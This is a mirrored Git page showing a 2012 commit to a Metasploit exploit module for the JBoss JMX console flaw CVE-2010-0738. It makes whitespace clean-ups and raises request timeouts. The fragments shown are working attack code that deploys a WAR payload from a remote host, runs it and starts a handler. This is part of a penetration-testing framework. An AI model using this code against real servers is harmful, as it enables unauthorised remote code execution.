infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added support for CVE-2010-0738, msftidy

unstable
h0ng10 2012-08-15 15:47:14 -04:00
parent e5498e3e1d
commit 6965431389
1 changed files with 10 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/exploits/multi/http/jboss_maindeployer.rb
View File

@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]), OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]), OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]), OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]),
OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']]) OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])
], self.class) ], self.class)
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
'argType' => 'java.lang.String', 'argType' => 'java.lang.String',
'arg0' => service_url 'arg0' => service_url
} }
}, 20) }, 30)
end end
if (! res) if (! res)
fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR archive [No Response]") fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR archive [No Response]")
@ -236,11 +236,11 @@ class Metasploit3 < Msf::Exploit::Remote
# #
print_status("Executing #{app_base}...") print_status("Executing #{app_base}...")
# The payload doesn't like POST requests # The payload doesn't like POST requests
# As the war file is not stored inside the jmx-console, we don't have to # As the war file is not stored inside the jmx-console, we don't have to
# care about the selected http method # care about the selected http method
tmp_verb = datastore['VERB'] tmp_verb = datastore['VERB']
tmp_verb = 'GET' if tmp_verb == 'POST' tmp_verb = 'GET' if tmp_verb == 'POST'
# JBoss might need some time for the deployment. Try 5 times at most and # JBoss might need some time for the deployment. Try 5 times at most and
# wait 3 seconds inbetween tries # wait 3 seconds inbetween tries
@ -249,8 +249,8 @@ class Metasploit3 < Msf::Exploit::Remote
num_attempts.times do |attempt| num_attempts.times do |attempt|
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => tmp_verb 'method' => tmp_verb
}, 20) }, 30)
msg = nil msg = nil
if (! res) if (! res)
@ -289,14 +289,14 @@ class Metasploit3 < Msf::Exploit::Remote
'argType' => 'java.lang.String', 'argType' => 'java.lang.String',
'arg0' => app_base 'arg0' => app_base
} }
}, 20) }, 30)
if (! res) if (! res)
print_error("WARNING: Undeployment failed on #{app_base} [No Response]") print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
elsif (res.code == 500 and datastore['VERB'] == 'POST') elsif (res.code == 500 and datastore['VERB'] == 'POST')
# POST requests result in a http 500 error, but the payload is removed..." # POST requests result in a http 500 error, but the payload is removed..."
print_status("WARNING: Undeployment might have failed (unlikely)") print_status("WARNING: Undeployment might have failed (unlikely)")
elsif (res.code < 200 or res.code >= 300) elsif (res.code < 200 or res.code >= 300)
print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]") print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
end end
handler handler